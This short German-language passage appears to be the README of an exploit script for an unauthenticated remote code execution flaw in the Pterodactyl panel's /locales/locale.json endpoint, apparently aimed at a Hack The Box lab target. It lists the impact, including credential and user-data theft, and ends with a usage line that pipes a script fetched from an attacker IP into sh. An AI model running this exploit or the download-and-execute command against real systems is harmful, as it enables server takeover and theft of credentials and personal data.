
Auswirkungen
Durch die Verwendung von /locales/locale.json mit den Abfrageparametern locale und namespace ist ein böswilliger Akteur in der Lage, beliebigen Code auszuführen, ohne authentifiziert zu sein.
Mit der Fähigkeit, beliebigen Code auszuführen, kann diese Schwachstelle auf unzählige Arten ausgenutzt werden. Sie könnte genutzt werden, um Zugriff auf den Server des Panels zu erlangen, Anmeldedaten aus der Konfiguration des Panels (.env oder anderweitig) zu lesen, sensible Informationen aus der Datenbank zu extrahieren (wie Benutzerdetails [Benutzername, E-Mail, Vor- und Nachname, gehashtes Passwort, IP-Adressen usw.]), auf Dateien von Servern zuzugreifen, die vom Panel verwaltet werden, usw.
Verwendung
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'